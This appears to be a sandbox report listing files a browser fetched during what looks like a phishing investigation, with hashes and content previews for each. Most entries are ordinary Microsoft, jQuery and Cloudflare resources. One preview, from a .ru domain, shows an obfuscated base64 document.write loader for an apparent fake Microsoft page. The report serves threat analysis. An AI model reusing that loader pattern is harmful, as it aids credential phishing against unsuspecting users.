                                                                                                        SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                                                                        Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 3 x 42, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.068159130770306
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPlSt/8kxl/k4E08up:6v/lhPq/8k7Tp
                                                                                                        MD5:AB671B2744DBCE2BFAF905B35FB3C4A6
                                                                                                        SHA1:70FAFD3A18C73F21C9E9307494B966F30E159917
                                                                                                        SHA-256:C7CA813EF61CFE3DFB409A84569FE90215033874BA0E162C10AF2F977EDF4F92
                                                                                                        SHA-512:8970EE58DFDC3D5161FA96FF2710E0CF2EC04C28D4E0612C255F17561A9CAB78463C2D034618D6FA9E94F5D51145B088A0B452D98D133F771C03440186A5B547
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......*.......v.....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):47692
                                                                                                        Entropy (8bit):5.4016459163756165
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):15
                                                                                                        Entropy (8bit):3.189898095464287
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Uh1Kn:UDKn
                                                                                                        MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                        SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                        SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                        SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                        Malicious:false
                                                                                                        URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                        Preview:/* empty css */
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (32089)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):92629
                                                                                                        Entropy (8bit):5.303443527492463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                        MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                        SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                        SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                        SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                        Malicious:false
                                                                                                        Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):47692
                                                                                                        Entropy (8bit):5.4016459163756165
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                        Malicious:false
                                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):4054
                                                                                                        Entropy (8bit):7.797012573497454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                        MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                        SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                        SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                        SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                        Malicious:false
                                                                                                        URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                        Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17174
                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                        Malicious:false
                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (41651)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):131537
                                                                                                        Entropy (8bit):5.2237799798561975
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                                        MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                        SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                        SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                        SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                                        Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (7469), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):19729
                                                                                                        Entropy (8bit):5.869034617432872
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Szzno9wPgTTNnSdfQGF3VIWC4fzno9wPgTTNnSdfQGFfQqrduTQfroqrduTQfrC:SnnuwgTRyIihnuwgTRyIi7lrLlrC
                                                                                                        MD5:568A7293F84537C01153AC72C4707DB8
                                                                                                        SHA1:3233B1F72769FAD3EE2EBCB9985C9B6B8F926104
                                                                                                        SHA-256:C5D509CCED55EDD863A8F3E43B97E19FF6FF7D37A2CF80248D34F4BD3249F445
                                                                                                        SHA-512:0ADA64592723A2DCB6B49734BD1601771DE2432543971014EE073734BDB83DC0056EBE495F55692E541FA2E768BE921A39C7FDE7CF115CD524F4E3F622D72863
                                                                                                        Malicious:false
                                                                                                        URL:https://4r.tatcharc.ru/hdlV/
                                                                                                        Preview: The way to get started is to quit talking and begin doing. -->....<script>../* The secret of success is to do the common thing uncommonly well. */..if(atob("aHR0cHM6Ly80Ui50YXRjaGFyYy5ydS9oZGxWLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (32089)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):92629
                                                                                                        Entropy (8bit):5.303443527492463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                        MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                        SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                        SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                        SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                        Malicious:false
                                                                                                        URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                                                        Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 3 x 42, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.068159130770306
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPlSt/8kxl/k4E08up:6v/lhPq/8k7Tp
                                                                                                        MD5:AB671B2744DBCE2BFAF905B35FB3C4A6
                                                                                                        SHA1:70FAFD3A18C73F21C9E9307494B966F30E159917
                                                                                                        SHA-256:C7CA813EF61CFE3DFB409A84569FE90215033874BA0E162C10AF2F977EDF4F92
                                                                                                        SHA-512:8970EE58DFDC3D5161FA96FF2710E0CF2EC04C28D4E0612C255F17561A9CAB78463C2D034618D6FA9E94F5D51145B088A0B452D98D133F771C03440186A5B547
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f40fce70d2b43c1/1734544156658/pyZm-HMUItdel49
                                                                                                        Preview:.PNG........IHDR.......*.......v.....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):563851
                                                                                                        Entropy (8bit):5.221453271093944
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                                                        MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                        SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                                        SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                        SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                        Malicious:false
                                                                                                        URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                                        Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):26288
                                                                                                        Entropy (8bit):7.984195877171481
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                        MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                        SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                        SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                        SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
